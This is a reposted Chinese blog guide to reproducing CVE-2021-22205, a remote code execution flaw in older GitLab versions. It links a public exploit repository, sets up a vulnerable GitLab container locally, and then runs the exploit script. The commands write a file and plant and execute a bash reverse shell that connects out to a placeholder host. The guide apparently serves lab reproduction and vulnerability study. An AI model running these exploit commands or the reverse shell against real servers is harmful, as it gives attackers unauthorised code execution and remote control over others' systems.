[开发工具] CVE-2021-22205复现

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 开发工具 -> CVE-2021-22205复现 -> 正文阅读

[开发工具]CVE-2021-22205复现

?影响版本：

RCE exploit for gitlab version < 13.10.3

git工具：

GitHub - mr-r3bot/Gitlab-CVE-2021-22205

https://github.com/projectdiscovery/nuclei

https://github.com/projectdiscovery/nuclei-templates

环境搭建：

export GITLAB_HOME=/Users/XXX/Desktop/software/CVE/CVE-2021-22205
docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

建议内存开大，直接访问本地端口

验证

?写文件：

python3 CVE-2021-22205.py -a true -t http://localhost:8089/ -c "echo 'Attacked by Al1exp' > /tmp/1.txt"

?????????反弹shell?

python3 CVE-2021-22205.py -a true -t http://127.0.0.1:8089 -c "echo 'bash -i >& /dev/tcp/xxxxxxxx/8080 0>&1' > /tmp/1.sh"
python3 CVE-2021-22205.py -a true -t http://127.0.0.1:8089 -c "chmod +x /tmp/1.sh"
python3 CVE-2021-22205.py -a true -t http://127.0.0.1:8089 -c "/bin/bash /tmp/1.sh"